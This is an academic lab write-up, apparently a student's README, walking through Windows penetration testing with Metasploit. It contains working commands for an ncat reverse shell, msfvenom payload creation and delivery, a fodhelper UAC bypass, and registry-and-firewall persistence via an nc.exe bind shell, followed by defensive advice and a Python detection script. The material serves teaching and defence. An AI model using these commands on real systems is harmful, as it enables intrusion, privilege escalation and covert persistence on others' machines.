THIS PROJECT IS FOR EDUCATIONAL PURPOSES ONLY
All techniques demonstrated in this project were performed in a controlled lab environment with explicit authorization. These methods should NEVER be used on systems without proper authorization.
Unauthorized access to computer systems is illegal and punishable by law.
Practical implementation of Windows penetration testing techniques using Metasploit Framework, demonstrating exploitation, post-exploitation, and persistence mechanisms in a controlled environment.
Academic Project | Master 2 - Sécurité des Systèmes d'Information | 2024-2025
- Understand Windows exploitation techniques
- Master Metasploit Framework and Meterpreter
- Implement post-exploitation strategies
- Establish persistence mechanisms
- Comprehend attacker TTPs (Tactics, Techniques, and Procedures)
- Develop defensive mindset through offensive security
- Kali Linux - Penetration testing distribution
- Metasploit Framework - Exploitation framework
- Meterpreter - Advanced payload
- Msfvenom - Payload generator
- NetCat (nc) - Network utility for reverse shells
- Windows 10 - Target operating system
- NSClient++ - Windows monitoring agent (used as attack vector)
- Reverse TCP connections
- Payload generation and delivery
- User Account Control (UAC) bypass
- Registry-based persistence
- Windows Firewall manipulation
- Post-exploitation enumeration
Network Discovery:
```bash
# Host discovery: ping sweep of the lab subnet
nmap -sn 192.168.1.0/24
# Full TCP port scan with service/version detection of the target
nmap -sV -p- 192.168.1.2
# Default NSE scripts plus version detection for service enumeration
nmap -sC -sV 192.168.1.2
```
On Kali Linux (Attacker):
```bash
# Start NetCat listener on TCP 4444 and wait for the target to connect back
nc -lvp 4444
```
On Windows 10 (Target):
```cmd
# Connect out to the attacker and attach cmd.exe to the socket
ncat 192.168.1.3 4444 -e cmd.exe
```
Result: direct command shell access, in the security context of the user who ran ncat, over an unencrypted TCP connection. The `-e` option exists in Nmap's ncat and in the classic Windows nc.exe build; it is absent from the OpenBSD netcat shipped on most Linux distributions.
Payload Generation:
```bash
# Staged Meterpreter reverse TCP payload, calling back to the Kali host on 3333
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.3 \
  LPORT=3333 \
  -f exe \
  -o runme.exe
```
Delivery:
```bash
# Host on the attacker's web server; the target fetches http://192.168.1.3/runme.exe
mv runme.exe /var/www/html/
systemctl start apache2
```
Handler (must be listening before runme.exe runs on the target, with the same payload, LHOST and LPORT that were baked into the executable):
```
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.3
set LPORT 3333
exploit -j
```
`exploit -j` runs the handler as a background job so the console stays free; the Meterpreter session opens as session 1 when the target executes the payload.
Meterpreter Commands:
```
sysinfo    # System information
getuid     # Current user
ps         # Running processes
ipconfig   # Network configuration
```
UAC Bypass (fodhelper), run from the msfconsole prompt after `background` has returned the Meterpreter session to the console:
```
use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
set LHOST 192.168.1.3
set LPORT 3333
exploit
```
Result: a second Meterpreter session running at high integrity, obtained without a UAC prompt. Two caveats a tester should keep in mind: the fodhelper technique only elevates an account that is already a member of the local Administrators group (it auto-approves the admin token; it does not turn a standard user into an administrator), and with the handler job from the previous step still bound to 3333, choosing a distinct LPORT here avoids a bind conflict for the new session.
Registry Persistence (from the elevated Meterpreter session; writing into system32 and into the HKLM Run key both require administrative rights):
```
# Upload NetCat
upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32\\nc.exe
# Registry entry: the HKLM Run key starts the listener at every interactive logon
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run \
  -v netcat \
  -d "C:\\Windows\\system32\\nc.exe -lvp 4445 -e cmd.exe"
```
The `reg setval` command is split across lines for readability; the Meterpreter console takes it as a single line. Unlike the initial access, this persisted listener is a bind shell: nc.exe waits on TCP 4445 for the attacker to connect in, so Windows Firewall must allow the inbound port (next step). Note also that `-l` exits after the first client disconnects, so the shell is usable once per logon unless the Windows build's `-L` (re-listen) option is used instead.
Firewall Rule (from an elevated `shell` on the target):
```cmd
netsh advfirewall firewall add rule ^
  name="netcat" ^
  protocol=TCP ^
  dir=in ^
  localport=4445 ^
  action=allow
```

| Attack Phase | Technique | Success Rate |
|---|---|---|
| Initial Access | NetCat reverse shell | ✅ 100% |
| Payload Delivery | Msfvenom executable | ✅ 100% |
| Exploitation | Meterpreter session | ✅ 100% |
| Privilege Escalation | UAC bypass | ✅ 100% |
| Persistence | Registry Run key | ✅ 100% |
- Monitor unusual outbound connections (a freshly downloaded executable such as runme.exe opening a TCP connection to a non-web port like 3333)
- Detect registry Run key modifications (HKLM and HKCU ...\CurrentVersion\Run, especially values that launch nc.exe or cmd.exe)
- Use EDR (Endpoint Detection and Response) to correlate process, registry and network events on the endpoint
- Enable Windows Defender Real-Time Protection, so the staged payload and nc.exe are scanned when written to disk
- Monitor firewall rule changes (e.g. `netsh advfirewall firewall add rule ... dir=in action=allow` executed outside a software deployment)
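The detections above can be written as rules. The following Python is an added example, not part of this project: it runs over a constructed, inline set of Sysmon-style events whose fields mirror the commands in this README (the nc.exe Run value, the `ms-settings\shell\open\command` key that bypassuac_fodhelper writes, the netsh rule, runme.exe calling back to port 3333). Event IDs follow Sysmon's numbering (13 registry value set, 1 process creation, 3 network connection); the path and port heuristics are assumptions to tune for a real environment, not vendor signatures.

```python
"""Detection logic for the indicators listed above, run over constructed
Sysmon-style events (JSON lines, one event per line, field names as Sysmon
reports them: EventID 13 = registry value set, 1 = process create,
3 = network connection). Added example for this README; the events are made
up to mirror the commands in this project, not log data from the lab."""
import json
import re

# Constructed sample: a benign Run-key write, the nc.exe persistence entry,
# the fodhelper UAC-bypass key, the netsh rule and two outbound connections.
SAMPLE_EVENTS = r"""
{"EventID": 13, "Image": "C:\\Windows\\explorer.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive", "Details": "\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"}
{"EventID": 13, "Image": "C:\\Users\\lab\\Downloads\\runme.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\netcat", "Details": "C:\\Windows\\system32\\nc.exe -lvp 4445 -e cmd.exe"}
{"EventID": 13, "Image": "C:\\Users\\lab\\Downloads\\runme.exe", "TargetObject": "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command\\DelegateExecute", "Details": "(Empty)"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\netsh.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "netsh advfirewall firewall add rule name=\"netcat\" protocol=TCP dir=in localport=4445 action=allow"}
{"EventID": 3, "Image": "C:\\Users\\lab\\Downloads\\runme.exe", "Initiated": true, "DestinationIp": "192.168.1.3", "DestinationPort": 3333}
{"EventID": 3, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "Initiated": true, "DestinationIp": "203.0.113.10", "DestinationPort": 443}
"""

RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Value data that hands a shell to the network: nc/ncat, `-e cmd.exe`, cmd /c, powershell
SHELL_HINT = re.compile(r"\b(nc|ncat|netcat)(\.exe)?\b|-e\s+cmd\.exe|cmd\.exe\s*/c|powershell", re.IGNORECASE)
# Key written by the fodhelper.exe auto-elevation abuse used by bypassuac_fodhelper
FODHELPER_KEY = re.compile(r"\\Classes\\ms-settings\\shell\\open\\command", re.IGNORECASE)
FW_ALLOW_IN = re.compile(r"advfirewall\s+firewall\s+add\s+rule\b(?=.*\bdir=in\b)(?=.*\baction=allow\b)", re.IGNORECASE)
# Assumed "trusted" install locations; anything else counts as a user-writable path
TRUSTED_DIRS = re.compile(r"^C:\\(Windows|Program Files( \(x86\))?)\\", re.IGNORECASE)
WEB_PORTS = {80, 443}


def analyse(event: dict) -> list:
    """Return (rule, severity, detail) tuples for one event; empty if benign."""
    alerts = []
    eid = event.get("EventID")
    image = event.get("Image", "")
    from_user_path = not TRUSTED_DIRS.match(image)
    if eid == 13:
        target = event.get("TargetObject", "")
        details = event.get("Details", "")
        if RUN_KEY.search(target):
            # Every Run-key write is worth logging; shell-like data or a writer
            # outside Windows/Program Files makes it a high-severity alert.
            severity = "high" if (SHELL_HINT.search(details) or from_user_path) else "low"
            alerts.append(("run_key_write", severity, f"{image}: {target} = {details}"))
        if FODHELPER_KEY.search(target):
            alerts.append(("fodhelper_uac_bypass", "high", f"{image}: {target}"))
    elif eid == 1 and FW_ALLOW_IN.search(event.get("CommandLine", "")):
        alerts.append(("firewall_inbound_allow_added", "medium", event["CommandLine"]))
    elif eid == 3 and event.get("Initiated") and from_user_path \
            and event.get("DestinationPort") not in WEB_PORTS:
        alerts.append(("unusual_outbound", "medium",
                       f"{image} -> {event.get('DestinationIp')}:{event.get('DestinationPort')}"))
    return alerts


def scan(jsonl: str) -> list:
    """Run analyse() over every non-empty line of a JSON-lines log."""
    found = []
    for line in jsonl.strip().splitlines():
        if line.strip():
            found.extend(analyse(json.loads(line)))
    return found


if __name__ == "__main__":
    for rule, severity, detail in scan(SAMPLE_EVENTS):
        print(f"[{severity:6}] {rule}: {detail}")
```

On the sample, the OneDrive entry is logged at low severity (a trusted process, no shell-like data), while the four steps of this project (nc.exe Run value, fodhelper key, inbound allow rule, runme.exe calling back on 3333) each produce an alert and the Firefox HTTPS connection produces none. Real deployments would add the image hash, signer and parent process to the heuristics.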
- ✅ Keep systems patched
- ✅ Use robust antivirus
- ✅ Enable Windows Defender
- ✅ Implement application whitelisting (AppLocker / WDAC), which stops unsigned binaries such as runme.exe and nc.exe from running at all
- ✅ Use least privilege principle: daily-use accounts should not be local administrators, which removes the UAC-bypass path to high integrity
- ✅ Monitor registry changes, in particular the Run keys
- ✅ Network segmentation, so a compromised workstation cannot reach internal services freely
- ✅ Strong authentication (MFA)
- Metasploit Framework proficiency
- Payload generation with Msfvenom
- Meterpreter post-exploitation
- Windows privilege escalation
- UAC bypass techniques
- Registry manipulation
- Persistence mechanisms
- Network reconnaissance
- Attack lifecycle (Kill Chain)
- Post-exploitation strategies
- Privilege escalation
- Defense evasion tactics
- Attacker TTPs
- Incident response
Mariama DIACK
Master 2 - Sécurité des Systèmes d'Information
IMPORTANT: This project is strictly for educational purposes in a controlled academic environment. Misuse of these techniques is illegal and unethical.